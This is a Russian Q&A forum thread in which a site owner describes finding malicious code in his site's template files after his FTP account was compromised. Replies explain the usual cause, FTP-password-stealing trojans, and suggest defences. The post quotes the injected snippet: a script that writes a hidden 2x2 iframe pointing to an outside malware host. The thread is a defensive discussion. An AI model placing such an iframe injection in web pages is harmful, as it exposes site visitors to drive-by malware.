Задать вопрос

Вирусы на сайте. Как взломали FTP?

2 июля неожиданно пришло мне на почту вот такое письмо от Яндекса:

Some of the pages on your website may pose a threat to your visitor's computer security. The number of potentially harmful pages is 1.



Зарегистрировался на webmaster.yandex.com, запустил повторную проверку. На следующий день оно написало, что всё нормально, но я всё таки решил сравнить все файлы сайта с прошлогодней копией. Оказалось, что отличаются 12 файлов.


В папке temlates два файла имели дату 29.06.12. В файле header.tpl вместо строки

<body style="background: url(<?=PATH_WEB?>img/main_bg.gif) repeat-y center #244e9f;">



обнаружилось вот такое безобразие:

<body style="background: url(<?=PATH_WEB?><!--c3284d--> type="text/javascript">
document.write('<iframe src="httр://yоgоtraff.cu.cc/in.cgi?11" name="Google " scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->

img/main_bg.gif) repeat-y center #244e9f;">



То же самое было в файле galleryEdit.tpl и ещё в десяти файлах в папке script\jscalendar.


Если поискать в Google, этот yogotraff можно встретить в коде множества русских сайтов: www.google.ru/search?ie=UTF-8&hl=ru&q=yogotraff.


Явно, это какая-то вредоносная дрянь. Разумеется, я восстановил файлы, поменял пароли и написал запрос хостинг-провайдеру, с вопросом каким образом произошло заражение. Получил ответ и логи. В это время кто-то с американского адреса 208.77.96.72 залез на два моих ftp (причём второе находится внутри первого) и заменил там кучу файлов. Как выяснилось, пострадали и другие мои сайты. Провайдер предложил проверить мой компьютер на вирусы. Проверил. DrWeb'ом и Касперским с загрузочных дисков для очистки совести. Нету вирусов. Только всякая мелочёвка в кэше FireFox'а. И как же тогда у меня утащили ftp-пароль? Он сложный, его не подберёшь.


Как страшно жить.
  • Вопрос задан
  • 5603 просмотра
Подписаться 5 Оценить Комментировать
Пригласить эксперта
Ответы на вопрос 7
@Ruma7a
«Он сложный, его не подберёшь»

Угу, только вот передаётся в виде plain text ) Может стоит подумать об SSH/SFTP? Заранее прошу прощения, если у вас и так уже всё секурно в этом плане, просто у вас там упоминается «просто» FTP.
Ответ написан
Достаточно стандартная ситуация — прут троянцем FTP-пароли на сайты. То есть вирусы есть или были. Ищите троянца на всех компьютерах, с которых был доступ к сайту по FTP, возможно ходили еще откуда-то и забыли об этом. Меняйте пароль на FTP-доступ. Через шел ставьте разрешения на файлы такие, чтобы через FTP нельзя было их перезаписать, каждый раз, когда необходимо обновить сайт — меняйте разрешения обратно.
Ответ написан
А у хостера не Plesk случаем?
Ответ написан
@Niemand
Знаю точно, что так прут пароли из старых версий Filezilla, WS_FTP (про новые не знаю) и Total Commander.
Ответ написан
Комментировать
@freem4n
Сайты хостятся на шаредном хостинге? ОС сервера?
Ответ написан
charliez
@charliez
достаточно зайти на зараженный по такой же схеме сайт любым браузером, и через уязвимости adobe flash / sun java вирус активируется на компьютере и сканирует сохраненные пароли в файлах настроек популярных ftp клиентов.
Ответ написан
Комментировать
@odmin4eg
стандартная ситуация, как пишут выше, протроянен комп с которого хоть раз заходили на сайт.

троянцы давно умеют собирать пароли с «фар» «тотал коммандера» и прочих популярных программ.

меняйте пароли следите за попытками входа, ограничте входящие айпи на фтп
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы